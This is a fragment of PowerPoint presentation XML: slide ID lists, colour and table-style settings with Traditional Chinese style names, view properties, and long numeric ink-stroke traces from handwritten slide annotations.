    <p:sldId id="1545" r:id="rId155"/>
    <p:sldId id="1546" r:id="rId156"/>
    <p:sldId id="1547" r:id="rId157"/>
    <p:sldId id="1548" r:id="rId158"/>
    <p:sldId id="1213" r:id="rId159"/>
    <p:sldId id="1214" r:id="rId160"/>
    <p:sldId id="1215" r:id="rId161"/>
    <p:sldId id="1216" r:id="rId162"/>
    <p:sldId id="1217" r:id="rId163"/>
    <p:sldId id="1218" r:id="rId164"/>
    <p:sldId id="1219" r:id="rId165"/>
    <p:sldId id="1220" r:id="rId166"/>
    <p:sldId id="1221" r:id="rId167"/>
    <p:sldId id="1222" r:id="rId168"/>
    <p:sldId id="1223" r:id="rId169"/>
    <p:sldId id="1224" r:id="rId170"/>
    <p:sldId id="1225" r:id="rId171"/>
    <p:sldId id="1226" r:id="rId172"/>
    <p:sldId id="1227" r:id="rId173"/>
    <p:sldId id="1229" r:id="rId174"/>
    <p:sldId id="1230" r:id="rId175"/>
    <p:sldId id="1231" r:id="rId176"/>
    <p:sldId id="1232" r:id="rId177"/>
    <p:sldId id="1233" r:id="rId178"/>
    <p:sldId id="1234" r:id="rId179"/>
    <p:sldId id="1235" r:id="rId180"/>
    <p:sldId id="1236" r:id="rId181"/>
    <p:sldId id="1237" r:id="rId182"/>
    <p:sldId id="1238" r:id="rId183"/>
    <p:sldId id="1239" r:id="rId184"/>
    <p:sldId id="1240" r:id="rId185"/>
    <p:sldId id="1241" r:id="rId186"/>
    <p:sldId id="1242" r:id="rId187"/>
    <p:sldId id="1243" r:id="rId188"/>
    <p:sldId id="1244" r:id="rId189"/>
    <p:sldId id="1245" r:id="rId190"/>
    <p:sldId id="1246" r:id="rId191"/>
    <p:sldId id="1248" r:id="rId192"/>
    <p:sldId id="1249" r:id="rId193"/>
    <p:sldId id="1251" r:id="rId194"/>
    <p:sldId id="1252" r:id="rId195"/>
    <p:sldId id="1253" r:id="rId196"/>
    <p:sldId id="1257" r:id="rId197"/>
    <p:sldId id="1258" r:id="rId198"/>
    <p:sldId id="1259" r:id="rId199"/>
    <p:sldId id="1260" r:id="rId200"/>
    <p:sldId id="1261" r:id="rId201"/>
    <p:sldId id="1262" r:id="rId202"/>
    <p:sldId id="1263" r:id="rId203"/>
    <p:sldId id="1264" r:id="rId204"/>
    <p:sldId id="1265" r:id="rId205"/>
    <p:sldId id="1266" r:id="rId206"/>
    <p:sldId id="1600" r:id="rId207"/>
    <p:sldId id="1601" r:id="rId208"/>
    <p:sldId id="1640" r:id="rId209"/>
    <p:sldId id="1639" r:id="rId210"/>
    <p:sldId id="1278" r:id="rId211"/>
    <p:sldId id="1280" r:id="rId212"/>
    <p:sldId id="1625" r:id="rId213"/>
    <p:sldId id="1281" r:id="rId214"/>
    <p:sldId id="1283" r:id="rId215"/>
    <p:sldId id="1282" r:id="rId216"/>
    <p:sldId id="1284" r:id="rId217"/>
    <p:sldId id="1555" r:id="rId218"/>
    <p:sldId id="1556" r:id="rId219"/>
    <p:sldId id="1558" r:id="rId220"/>
    <p:sldId id="1559" r:id="rId221"/>
    <p:sldId id="1557" r:id="rId222"/>
    <p:sldId id="1562" r:id="rId223"/>
    <p:sldId id="1563" r:id="rId224"/>
    <p:sldId id="1285" r:id="rId225"/>
    <p:sldId id="1620" r:id="rId226"/>
    <p:sldId id="1286" r:id="rId227"/>
    <p:sldId id="1621" r:id="rId228"/>
    <p:sldId id="1287" r:id="rId229"/>
    <p:sldId id="1622" r:id="rId230"/>
    <p:sldId id="1288" r:id="rId231"/>
    <p:sldId id="1292" r:id="rId232"/>
    <p:sldId id="1623" r:id="rId233"/>
    <p:sldId id="1293" r:id="rId234"/>
    <p:sldId id="1294" r:id="rId235"/>
    <p:sldId id="1295" r:id="rId236"/>
    <p:sldId id="1602" r:id="rId237"/>
    <p:sldId id="1346" r:id="rId238"/>
    <p:sldId id="1345" r:id="rId239"/>
    <p:sldId id="1551" r:id="rId240"/>
    <p:sldId id="1347" r:id="rId241"/>
    <p:sldId id="1573" r:id="rId242"/>
    <p:sldId id="1584" r:id="rId243"/>
    <p:sldId id="1585" r:id="rId244"/>
    <p:sldId id="1588" r:id="rId245"/>
    <p:sldId id="1583" r:id="rId246"/>
    <p:sldId id="1549" r:id="rId247"/>
    <p:sldId id="1550" r:id="rId248"/>
    <p:sldId id="1487" r:id="rId249"/>
    <p:sldId id="1607" r:id="rId250"/>
    <p:sldId id="1608" r:id="rId251"/>
    <p:sldId id="1552" r:id="rId252"/>
    <p:sldId id="1605" r:id="rId253"/>
    <p:sldId id="1610" r:id="rId254"/>
    <p:sldId id="1611" r:id="rId255"/>
    <p:sldId id="1553" r:id="rId256"/>
    <p:sldId id="1613" r:id="rId257"/>
    <p:sldId id="1614" r:id="rId258"/>
    <p:sldId id="1461" r:id="rId259"/>
    <p:sldId id="1612" r:id="rId260"/>
    <p:sldId id="1458" r:id="rId261"/>
    <p:sldId id="1488" r:id="rId262"/>
    <p:sldId id="1590" r:id="rId263"/>
    <p:sldId id="1599" r:id="rId264"/>
    <p:sldId id="1603" r:id="rId265"/>
    <p:sldId id="1615" r:id="rId266"/>
    <p:sldId id="1596" r:id="rId267"/>
    <p:sldId id="1595" r:id="rId268"/>
    <p:sldId id="1598" r:id="rId269"/>
    <p:sldId id="1592" r:id="rId270"/>
    <p:sldId id="1593" r:id="rId271"/>
    <p:sldId id="1594" r:id="rId272"/>
    <p:sldId id="1633" r:id="rId273"/>
    <p:sldId id="1634" r:id="rId274"/>
    <p:sldId id="1632" r:id="rId275"/>
    <p:sldId id="1635" r:id="rId276"/>
    <p:sldId id="1636" r:id="rId277"/>
    <p:sldId id="1637" r:id="rId278"/>
    <p:sldId id="1638" r:id="rId279"/>
    <p:sldId id="1574" r:id="rId280"/>
    <p:sldId id="1576" r:id="rId281"/>
    <p:sldId id="1578" r:id="rId282"/>
    <p:sldId id="1643" r:id="rId283"/>
    <p:sldId id="1646" r:id="rId284"/>
    <p:sldId id="1647" r:id="rId285"/>
    <p:sldId id="1648" r:id="rId286"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3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標楷體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81256067-1106-4B7C-BB85-C72EFE7E4DC0}">
          <p14:sldIdLst>
            <p14:sldId id="443"/>
            <p14:sldId id="1471"/>
            <p14:sldId id="1140"/>
            <p14:sldId id="1142"/>
            <p14:sldId id="1564"/>
            <p14:sldId id="1565"/>
            <p14:sldId id="1566"/>
            <p14:sldId id="1554"/>
            <p14:sldId id="1144"/>
            <p14:sldId id="1145"/>
            <p14:sldId id="1146"/>
            <p14:sldId id="1147"/>
            <p14:sldId id="1148"/>
            <p14:sldId id="1149"/>
            <p14:sldId id="1150"/>
            <p14:sldId id="1151"/>
            <p14:sldId id="1152"/>
            <p14:sldId id="1153"/>
            <p14:sldId id="1567"/>
            <p14:sldId id="1569"/>
            <p14:sldId id="1568"/>
            <p14:sldId id="1570"/>
            <p14:sldId id="1571"/>
            <p14:sldId id="1572"/>
            <p14:sldId id="1160"/>
            <p14:sldId id="1462"/>
            <p14:sldId id="1463"/>
            <p14:sldId id="1464"/>
            <p14:sldId id="1465"/>
            <p14:sldId id="1466"/>
            <p14:sldId id="1467"/>
            <p14:sldId id="1468"/>
            <p14:sldId id="1469"/>
            <p14:sldId id="1161"/>
            <p14:sldId id="1162"/>
            <p14:sldId id="1163"/>
            <p14:sldId id="1520"/>
            <p14:sldId id="1489"/>
            <p14:sldId id="1490"/>
            <p14:sldId id="1521"/>
            <p14:sldId id="1522"/>
            <p14:sldId id="1577"/>
            <p14:sldId id="1523"/>
            <p14:sldId id="1491"/>
            <p14:sldId id="1579"/>
            <p14:sldId id="1492"/>
            <p14:sldId id="1493"/>
            <p14:sldId id="1494"/>
            <p14:sldId id="1495"/>
            <p14:sldId id="1496"/>
            <p14:sldId id="1497"/>
            <p14:sldId id="1498"/>
            <p14:sldId id="1499"/>
            <p14:sldId id="1500"/>
            <p14:sldId id="1501"/>
            <p14:sldId id="1502"/>
            <p14:sldId id="1503"/>
            <p14:sldId id="1504"/>
            <p14:sldId id="1505"/>
            <p14:sldId id="1506"/>
            <p14:sldId id="1507"/>
            <p14:sldId id="1510"/>
            <p14:sldId id="1511"/>
            <p14:sldId id="1513"/>
            <p14:sldId id="1616"/>
            <p14:sldId id="1617"/>
            <p14:sldId id="1619"/>
            <p14:sldId id="1618"/>
            <p14:sldId id="1626"/>
            <p14:sldId id="1627"/>
            <p14:sldId id="1628"/>
            <p14:sldId id="1629"/>
            <p14:sldId id="1630"/>
            <p14:sldId id="1516"/>
            <p14:sldId id="1517"/>
            <p14:sldId id="1518"/>
            <p14:sldId id="1519"/>
            <p14:sldId id="1624"/>
            <p14:sldId id="1167"/>
            <p14:sldId id="1168"/>
            <p14:sldId id="1169"/>
            <p14:sldId id="1170"/>
            <p14:sldId id="1171"/>
            <p14:sldId id="1172"/>
            <p14:sldId id="1173"/>
            <p14:sldId id="1174"/>
            <p14:sldId id="1179"/>
            <p14:sldId id="1665"/>
            <p14:sldId id="1524"/>
            <p14:sldId id="1525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89"/>
            <p14:sldId id="1190"/>
            <p14:sldId id="1191"/>
            <p14:sldId id="1192"/>
            <p14:sldId id="1193"/>
            <p14:sldId id="1194"/>
            <p14:sldId id="1196"/>
            <p14:sldId id="1197"/>
            <p14:sldId id="1198"/>
            <p14:sldId id="1201"/>
            <p14:sldId id="1652"/>
            <p14:sldId id="1649"/>
            <p14:sldId id="1473"/>
            <p14:sldId id="1658"/>
            <p14:sldId id="1651"/>
            <p14:sldId id="1653"/>
            <p14:sldId id="1654"/>
            <p14:sldId id="1657"/>
            <p14:sldId id="1655"/>
            <p14:sldId id="1208"/>
            <p14:sldId id="1209"/>
            <p14:sldId id="1210"/>
            <p14:sldId id="1211"/>
            <p14:sldId id="1212"/>
            <p14:sldId id="1486"/>
            <p14:sldId id="1482"/>
            <p14:sldId id="1631"/>
            <p14:sldId id="1484"/>
            <p14:sldId id="1485"/>
            <p14:sldId id="1526"/>
            <p14:sldId id="1659"/>
            <p14:sldId id="1581"/>
            <p14:sldId id="1527"/>
            <p14:sldId id="1661"/>
            <p14:sldId id="1660"/>
            <p14:sldId id="1528"/>
            <p14:sldId id="1529"/>
            <p14:sldId id="1530"/>
            <p14:sldId id="1531"/>
            <p14:sldId id="1533"/>
            <p14:sldId id="1534"/>
            <p14:sldId id="1535"/>
            <p14:sldId id="1536"/>
            <p14:sldId id="1662"/>
            <p14:sldId id="1663"/>
            <p14:sldId id="1664"/>
            <p14:sldId id="1537"/>
            <p14:sldId id="1538"/>
            <p14:sldId id="1539"/>
            <p14:sldId id="1540"/>
            <p14:sldId id="1541"/>
            <p14:sldId id="1542"/>
            <p14:sldId id="1543"/>
            <p14:sldId id="1544"/>
            <p14:sldId id="1545"/>
            <p14:sldId id="1546"/>
            <p14:sldId id="1547"/>
            <p14:sldId id="1548"/>
            <p14:sldId id="1213"/>
            <p14:sldId id="1214"/>
            <p14:sldId id="1215"/>
            <p14:sldId id="1216"/>
            <p14:sldId id="1217"/>
            <p14:sldId id="1218"/>
            <p14:sldId id="1219"/>
            <p14:sldId id="1220"/>
            <p14:sldId id="1221"/>
            <p14:sldId id="1222"/>
            <p14:sldId id="1223"/>
            <p14:sldId id="1224"/>
            <p14:sldId id="1225"/>
            <p14:sldId id="1226"/>
            <p14:sldId id="1227"/>
            <p14:sldId id="1229"/>
            <p14:sldId id="1230"/>
            <p14:sldId id="1231"/>
            <p14:sldId id="1232"/>
            <p14:sldId id="1233"/>
            <p14:sldId id="1234"/>
            <p14:sldId id="1235"/>
            <p14:sldId id="1236"/>
            <p14:sldId id="1237"/>
            <p14:sldId id="1238"/>
            <p14:sldId id="1239"/>
            <p14:sldId id="1240"/>
            <p14:sldId id="1241"/>
            <p14:sldId id="1242"/>
            <p14:sldId id="1243"/>
            <p14:sldId id="1244"/>
            <p14:sldId id="1245"/>
            <p14:sldId id="1246"/>
            <p14:sldId id="1248"/>
            <p14:sldId id="1249"/>
            <p14:sldId id="1251"/>
            <p14:sldId id="1252"/>
            <p14:sldId id="1253"/>
            <p14:sldId id="1257"/>
            <p14:sldId id="1258"/>
            <p14:sldId id="1259"/>
            <p14:sldId id="1260"/>
            <p14:sldId id="1261"/>
            <p14:sldId id="1262"/>
            <p14:sldId id="1263"/>
            <p14:sldId id="1264"/>
            <p14:sldId id="1265"/>
            <p14:sldId id="1266"/>
            <p14:sldId id="1600"/>
            <p14:sldId id="1601"/>
            <p14:sldId id="1640"/>
            <p14:sldId id="1639"/>
            <p14:sldId id="1278"/>
            <p14:sldId id="1280"/>
            <p14:sldId id="1625"/>
            <p14:sldId id="1281"/>
            <p14:sldId id="1283"/>
            <p14:sldId id="1282"/>
            <p14:sldId id="1284"/>
            <p14:sldId id="1555"/>
            <p14:sldId id="1556"/>
            <p14:sldId id="1558"/>
            <p14:sldId id="1559"/>
            <p14:sldId id="1557"/>
            <p14:sldId id="1562"/>
            <p14:sldId id="1563"/>
            <p14:sldId id="1285"/>
            <p14:sldId id="1620"/>
            <p14:sldId id="1286"/>
            <p14:sldId id="1621"/>
            <p14:sldId id="1287"/>
            <p14:sldId id="1622"/>
            <p14:sldId id="1288"/>
            <p14:sldId id="1292"/>
            <p14:sldId id="1623"/>
            <p14:sldId id="1293"/>
            <p14:sldId id="1294"/>
            <p14:sldId id="1295"/>
            <p14:sldId id="1602"/>
            <p14:sldId id="1346"/>
            <p14:sldId id="1345"/>
            <p14:sldId id="1551"/>
            <p14:sldId id="1347"/>
            <p14:sldId id="1573"/>
            <p14:sldId id="1584"/>
            <p14:sldId id="1585"/>
            <p14:sldId id="1588"/>
            <p14:sldId id="1583"/>
            <p14:sldId id="1549"/>
            <p14:sldId id="1550"/>
            <p14:sldId id="1487"/>
            <p14:sldId id="1607"/>
            <p14:sldId id="1608"/>
            <p14:sldId id="1552"/>
            <p14:sldId id="1605"/>
            <p14:sldId id="1610"/>
            <p14:sldId id="1611"/>
            <p14:sldId id="1553"/>
            <p14:sldId id="1613"/>
            <p14:sldId id="1614"/>
            <p14:sldId id="1461"/>
            <p14:sldId id="1612"/>
            <p14:sldId id="1458"/>
            <p14:sldId id="1488"/>
            <p14:sldId id="1590"/>
            <p14:sldId id="1599"/>
            <p14:sldId id="1603"/>
            <p14:sldId id="1615"/>
            <p14:sldId id="1596"/>
            <p14:sldId id="1595"/>
            <p14:sldId id="1598"/>
            <p14:sldId id="1592"/>
            <p14:sldId id="1593"/>
            <p14:sldId id="1594"/>
            <p14:sldId id="1633"/>
            <p14:sldId id="1634"/>
            <p14:sldId id="1632"/>
            <p14:sldId id="1635"/>
            <p14:sldId id="1636"/>
            <p14:sldId id="1637"/>
            <p14:sldId id="1638"/>
            <p14:sldId id="1574"/>
            <p14:sldId id="1576"/>
            <p14:sldId id="1578"/>
            <p14:sldId id="1643"/>
            <p14:sldId id="1646"/>
            <p14:sldId id="1647"/>
            <p14:sldId id="16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92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00FF"/>
    <a:srgbClr val="FFCC99"/>
    <a:srgbClr val="00CC00"/>
    <a:srgbClr val="FFFF00"/>
    <a:srgbClr val="FF3300"/>
    <a:srgbClr val="CC66FF"/>
    <a:srgbClr val="33CC33"/>
    <a:srgbClr val="FFCC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深色樣式 2 - 輔色 3/輔色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46F890A9-2807-4EBB-B81D-B2AA78EC7F39}" styleName="深色樣式 2 - 輔色 5/輔色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樣式 2 - 輔色 1/輔色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深色樣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38B1855-1B75-4FBE-930C-398BA8C253C6}" styleName="佈景主題樣式 2 - 輔色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4C1A8A3-306A-4EB7-A6B1-4F7E0EB9C5D6}" styleName="中等深淺樣式 3 - 輔色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2833802-FEF1-4C79-8D5D-14CF1EAF98D9}" styleName="淺色樣式 2 - 輔色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7515" autoAdjust="0"/>
    <p:restoredTop sz="96400" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr showGuides="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="125" d="100"/>
          <a:sy n="125" d="100"/>
        </p:scale>
        <p:origin x="702" y="-108"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2205"/>
        <p:guide pos="2925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12096"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="80" d="100"/>
          <a:sy n="80" d="100"/>
        </p:scale>
        <p:origin x="-3996" y="-96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viewProps" Target="viewProps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theme" Target="theme/theme1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tableStyles" Target="tableStyles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notesMaster" Target="notesMasters/notesMaster1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handoutMaster" Target="handoutMasters/handoutMaster1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presProps" Target="presProps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258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258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fld id="{C6127DBC-C019-4046-B85D-FD0331FC148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05242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5:39.7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64 4300,'0'0,"0"36,0-18,0 19,-36-37,18 36,-37-18,-35 73,-56-19,-17 37,-36-18,-37 36,-55 18,56 18,35-72,19 36,-1-18,73 18,0-36,37-37,36 19,36-19,0-18,90 37,-17-1,108 37,37-36,90 72,182-36,36-18,-163-55,127-36,-36 36,-1-36,-54 0,-108 0,-74 0,1 0,-55-18,-108-55,-19 37,-18-18,-18-55,-54 36,-19-72,-36 18,-36-54,36 17,-72-17,-73-19,0-72,-163-127,-128-200,-17 91,-55-36,55 18,-19 127,73 54,163 109,1 19,162 90,37 36,36 73,73 18,18 0,-18 0,36 72,-19 73,19 55,0 54,19 54,89 309,38-36,17 18,-18 36,18 0,109 18,-126-73,53-108,-54-200,-54-72,0-37,-37-18,-18-72,-36-1,37-126,-37-128,36-17,18-19,37-54,18-127,109-164,-73-17,54 36,-90-1,55-35,17-19,-72 109,36 164,-72 90,-19-18,19-18,-55 54,0 73,-18 18,0 54,0 55,0 36,0 18,0 19,0 17,18-17,-18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8:37.7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93 4264,'36'0,"-17"0,17 0,0 0,37 0,-1 0,1 0,36 0,18 0,-18 0,36 0,0 0,54 0,-35 0,17 0,37 0,18 18,36-18,-18 0,-36 0,-1 0,1 18,0 0,-55-18,-18 0,-36 0,-55 18,19-18,-37 0,1 36,-19-36,36 19,-36-19,0 0,19 0,-19 0,18 0,-18 0,19 0,-1 0,18 0,-17 0,-1 0,0 0,19 0,17 0,1 0,-19 18,1-18,-1 18,0-18,1 18,-1 0,-36-18,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7:16.0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99 8136 0,'40'0'32,"39"0"-32,20 0 15,0 0-15,40 0 16,0 0-16,0 0 15,-40-20 1,20 20-16,-59-20 16,39 0-16,0 20 15,-19 0-15,-21 0 16,60-20-16,40 20 16,59 0-16,-19 0 15,39 0-15,0 0 16,-20 0-16,-19 0 15,-1 0-15,-39 0 16,-40 0-16,0 0 16,20 0-16,-40 0 15,60 0-15,-20 0 16,0 0-16,-40 0 16,-59 0-16,39 0 15,20 0-15,-39 0 16,19 0-16,20 0 15,-19 0-15,-1 0 16,1 0-16,-21 0 16,20 0-16,-39 0 15,20 40-15,19-20 16,-59-20-16,20 20 16,-1-20-16,1 20 15,0-20 1,19 0-1,1 0-15,-1 0 16,21 19-16,-21-19 16,20 0-16,-19 0 15,19 0-15,-39 0 16,20 0-16,-21 0 16,1 0-16,20 0 15,-41 0-15,1 0 16,0 0-16,0 0 15,0 0-15,0 20 16,39-20-16,-19 0 16,39 20-16,-39-20 15,59 20-15,-20-20 16,1 0-16,19 0 16,-39 0-16,-1 0 15,-19 0-15,-1 0 16,1 0-16,0 0 15,0 0-15,-1 0 16,-19 0-16,0 0 16,0 0-16,0 0 62,-1 0-46,1 0-1,0 0 1,0 0 0,20 0-16,-1 0 15,-19 0-15,40 0 16,19 0-16,20 20 16,1 19-16,19 1 15,0 0-15,-60 0 16,21-21-16,-61-19 15,1 0-15,-20 20 16,20-20 31,0 0 265,0 0-296,0 0-16,19 0 16,-19 0-1,0-20-15,20 20 16,-20 0 62,-1 0-47,1 0-15,-20-19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24.7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44 11942 0,'-17'0'16,"17"17"31,0 1-32,17-18 1,1 0-16,35 0 16,0 0-16,17 0 15,19 0-15,17 0 16,17-18-16,0 18 16,36-17-1,18-1-15,-1-17 16,36 35-16,-18 0 15,17 0-15,-52 0 16,35 0-16,-35 0 16,194 0-1,-177 0-15,-17 0 16,-18 0-16,18 0 16,105 0-1,-140 0-15,-18 0 16,17 0-16,-17 0 15,141 0 1,-124 0 0,159 0-1,107 0 1,-107 0 15,-71 0-15,-122 0-1,158 0 1,246 17 0,-334-17-1,194 0 1,-18 0 0,71 71-1,-300-54 1,70 19-1,-17 17 1,-53-53 15,-71 0-15,-17 0 0,17 0 93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26.3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01 6720 0,'18'0'47,"35"0"-47,-18 0 16,35 0-16,1 0 15,17 0-15,36 0 16,-1 0-16,-17 0 15,35 0-15,35 0 16,-17 0 0,458 0-1,71 0 17,-476 0-32,-18 0 0,-18 0 15,19-17 1,-1 17-16,-53 0 15,300 17 1,-177 19 15,-211-19-31,-35-17 16,-1 0-16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00.3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412 12823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5:12.1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99 12047 0,'70'0'62,"36"0"-62,35 0 16,0 0-16,18 0 15,53 0 1,-1 36-16,1-36 0,0 0 16,-18 0-16,0 0 15,-53 0 1,-35 0-16,-1 0 0,-34 0 16,0 0-1,-36-18-15,0 18 16,0 0-16,-17 0 78,0 0-16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30.9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86 1517 0,'0'0'0,"0"88"0,-17 0 16,-1 18-16,-17 0 16,-89 106-1,71-142 1,-105 177-1,-319 159 1,319-318 0,-266 159-1,-123 0 1,442-212 0,-1 36-1,35-54 1,71 1-1,0 35 1,35 70 0,89-34-16,52-1 15,107 18-15,52-18 16,758 176 0,-475-105-16,-54-71 15,-70-35-15,-88 0 16,264 0-1,-564-53 1,-36 0 0,-52-106-1,-53-123 1,-71 53-16,0-1 16,-88-17-16,-35-35 15,-583-530 16,-52-105-15,494 494 0,140 158-1,177 124-15,0 53 16,36-1 0,-1 36-16,18 36 31,-53 281 0,-70 300-31,35-105 16,17-89-16,-35 1 15,18-54-15,0-35 16,70-70-16,1 35 16,-19-1-16,19-69 15,17-36-15,0-53 16,-4075-53-16,8150-53 15,-4058 1-15,1-19 32,0-17-17,17-70-15,0-18 16,0-36 0,1-17-16,69-53 15,-34 0-15,0 18 16,158-195-1,388-705 1,-405 706 0,88-177-1,-124 229 1,-158 283 0,-1 0-1,-17 17 1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5:41:11.0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71 13315 0,'39'0'63,"-19"0"-48,40 20-15,-1-20 16,41 0-16,39 0 15,-1 0-15,180 0 16,-1 0 15,-158 0-31,0 0 0,139 0 32,-80 0-17,60 0 1,-20 0-1,19 0 1,-38 0 0,-21 0-1,-40 0 1,-19 0 0,40 0-1,-120 0 1,40 0-16,60 0 15,-40 20-15,-1-20 16,1 19 0,-20-19-16,199 20 15,-159-20-15,-1 0 16,239 0 0,-40 0-1,-99 0 1,20 0-1,-159 0 1,119 0 0,-118 0-16,38 0 15,41 0-15,-41 0 16,41 0-16,19 0 16,20 0-1,-19 0-15,39 0 16,19 0-16,1 0 15,0 0-15,-20 0 16,40 0-16,-40 0 16,0 0-16,-139 0 15,158 0-15,1 0 16,0 0-16,-20 0 16,40 0-16,19 0 15,-59 0-15,0 0 16,-20 0-16,0 0 15,-19 0-15,-1 0 16,-20 0-16,179 0 16,-59 0 15,-140 0-31,41 0 16,-1 0 15,60 0-16,0 0 1,39 0 0,40 0-16,1 0 31,-1 0-15,-40 0-1,-138 0 1,-80 0-1,0 0-15,20 0 16,-99-20-16,0 20 16,0 0-1,39 0 1,60 0 0,-59 0-1,0 0-15,-1 0 16,-59-19-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5:42:02.5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950 2024 0,'40'0'31,"19"0"-31,-19 0 16,20 0-16,59 0 16,39-40-16,1 20 15,59 20 1,-39 0-16,59 0 16,20 0-16,0 0 0,218 0 31,-178 0-16,39 0 1,-138 0 0,-179-20-1,-1 20 1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5:42:05.7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10 6449 0,'20'0'16,"0"0"0,0 0-1,19 0 1,1 0 0,79 0-1,0 0 1,60 0-1,19 0 1,0 0 0,-19 0-1,-20 0 1,0 0 0,-40 0-1,-20 0 1,-20 0-1,1 0 1,-41 0 0,-19 0-1,0 0 1,20 0 0,-20 0-1,-1 0 63,1 0-62,0 0 0,0 0-16,20 0 15,-21 0-15,21 0 16,-20 0-16,0 0 15,0 0 1,-1 0 15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5:42:13.115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6866 6370 0,'20'0'31,"19"0"-15,-19 0 0,20 0-16,0 0 15,39 0-15,0 0 16,-19 0-1,79 0 1,0 0 0,-40 0-16,0 0 15,0 0-15,40 0 16,139 0 0,-99 0-16,-40 0 15,-20 0-15,0 0 16,59 0-1,-39 0 1,-119 0 0,0 0-16,0 0 15,0 0 63,0 0-78,-1 0 16,41 19 0,-20-19-1,-40 20-15,19-20 16,-19 20 78,20 0-79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5:44:14.5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68 6290 0,'0'0'0,"20"0"16,-1 0-1,21 0-15,-20 0 16,20 0 0,-1 0-16,21 0 15,-1 0-15,21 0 16,-21 0-16,21 0 15,-1 0 1,-20 0-16,1 0 16,-20 0-1,-20 0-15,19 0 16,-19 0 0,0 0-16,20 0 0,-21 0 15,1 0-15,80 0 31,-81 0-15,41 0-16,-40 0 31,0 0-15,19 0 0,1 20-1,-20-20 1,0 0-1,0 0 17,-1 0-17,61 20 1,-41-20-16,1 20 16,0-20-1,-20 20 1,-1-20-1,1 0 110,-20 19-125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7:29.5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352 8096 0,'20'0'156,"0"0"-140,-1 0-16,21 0 15,0 0-15,19 0 16,1 0-16,19 0 15,-19 0-15,19 0 16,-19 0-16,19 0 16,-19 0-1,-1 0-15,-19 0 16,19 0 0,-19 0-16,0 0 15,-20 0-15,39 0 16,-39 0-16,0 0 15,19-20-15,1 0 16,-20 20-16,0 0 16,19 0-16,-19 0 31,-20-20-15,20 20-1,0 0 1,0 0-16,0 0 15,0 0 1,-1 0 0,1 0-16,0 0 15,0 0 48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3:35.3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95 1834 0,'0'0'0,"89"0"0,34 18 16,-17 0-16,35-1 15,-17 1-15,17 0 16,17-1-16,19-17 16,-1 0-16,36 0 15,-18 0-15,-18 0 16,36 0-16,0 0 16,-1 0-16,19 0 15,16 0-15,-51 0 16,16 0-16,-17 0 15,0 0-15,-17 0 16,-1 0-16,-70 0 16,17 0-16,-34 0 15,34 0-15,0 0 16,36 0-16,0 36 16,0-19-16,-18 1 15,0-1-15,-18 1 16,-17 0-16,-18-18 15,-35 0-15,-17 0 16,-19 0 0,1 0 15,0 0-15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3:42.6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568 9772 0,'0'-18'62,"36"18"-30,-1 0-32,53 0 15,36 0-15,17 0 16,70 0-16,-52 0 15,70 0-15,-17 0 16,0 0-16,-1 0 16,-17 0-16,-17 0 15,-36 0-15,0 18 16,-18-18-16,-17 0 16,-35 18-16,-1-1 15,36-17-15,-18 0 16,1 18-16,-19-1 15,54-17-15,-36 18 16,0 0-16,-17-1 16,34-17-1,-52 0 1,0 0-16,-17 0 0,-1 0 16,0 0-16,18 0 15,-35 0 1,-1 0-1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3:48.0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86 5556 0,'17'0'109,"1"0"-93,-1 0-16,36 0 16,18 0-16,0 0 15,17 0-15,-18 0 16,18 0-16,-17-17 15,-18 17-15,-18 0 16,0 0-16,-17 0 16,0 0-16,-1 0 15,1 0 1,0 0-16,-1 0 0,1 0 16,17 0 93,-17 0-47,35 17-62,-18-17 16,36 0-16,-1 0 16,1 18-16,52 0 15,-17-1-15,-18 1 16,18-1-16,0 1 16,-18-18-16,-17 18 15,17-1-15,-18-17 16,-17 0-16,0 0 15,0 0-15,0 0 16,0 0-16,18 0 16,-19 0-16,19 0 15,0 0-15,-36 0 16,18 0-16,-18 0 16,18 18-16,-18-18 15,18 0 1,0 0-16,-18 18 15,18-18-15,-35 17 16,35-17-16,-18 0 16,0 0-16,1 0 15,17 0-15,-18 0 16,-18 0-16,36 0 16,-17 0-1,-1 0-15,0 0 16,-17 0-1,0 0 17,-1 0-17,1 0-15,17 0 16,0 0-16,18 0 16,0 0-16,18 0 15,35 0 1,-18 0-16,18 0 0,-1 0 15,1 0-15,-35 0 16,17 0-16,0 0 16,-35 0-1,0 0-15,35 0 0,-17 0 16,-1 0 0,-17 0-16,0 0 15,0 0-15,18 0 16,-36 0-16,-17 0 15,17 0-15,0 0 16,-17 0-16,-1 0 16,19 0-16,-1 18 15,18-18-15,-18 18 16,36-1-16,-1-17 16,1 0-16,-1 0 15,36 0-15,-53 0 16,0 0-16,-18 0 15,-17 0 1,17 0-16,-17 0 16,0 0 15,-1 0-15,1 0-1,17 0 1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3:49.1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12 5715 0,'17'0'47,"19"0"-32,17 0 1,-1 0-16,-16 0 16,17 0-16,17 0 15,-17 0-15,0 0 16,-18 0-16,18 0 15,-35 0-15,-1 0 16,1 0 78,-36 0-32,1 0-46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3:52.9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74 11218 0,'17'0'47,"1"0"-32,35 0 1,0-17-16,0-1 15,0 18-15,35-18 16,-18 1-16,54 17 16,-18 0-16,35 0 15,35 0-15,-35 0 16,18 0-16,-35 0 16,-1 0-16,-35 0 15,0 0-15,-35 0 16,0 0-16,0 0 15,-18 0-15,1 0 16,-1 0-16,0 0 16,18 0-16,18 0 15,-18 0-15,17 0 16,1 0-16,-18 0 16,-18 0-16,-17 0 15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02.4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92 4657 0,'0'-18'31,"-18"18"0,1 18-15,-1-18-1,-17 0 1,17 17-16,0-17 16,1 0-1,-18 0-15,17 0 16,-17 0-16,-1 0 16,-34 0-16,-54 0 15,36 0-15,-53 0 16,18-17-16,-1-1 15,18 0-15,18 1 16,0-1-16,17 18 16,18-18-16,18 18 15,0 0-15,-18 0 16,0 0-16,0 0 16,-70 0-1,52 0-15,18 0 16,0 0-16,0 0 15,18 18-15,-18-18 16,35 0-16,1 0 31,-1 0-31,1 0 16,-1 0-16,0 0 0,1 0 16,-1 0-1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04.6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09 9084 0,'0'-18'78,"18"18"-63,-1 0-15,1 0 16,-1 0-16,19-17 16,17 17-16,17 0 15,54 0-15,17 0 16,-18-18-16,71 18 16,-35 0-16,-35 0 15,-54 0-15,-35 0 16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09.1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55 9031 0,'0'0'0,"17"0"78,1 0-62,35 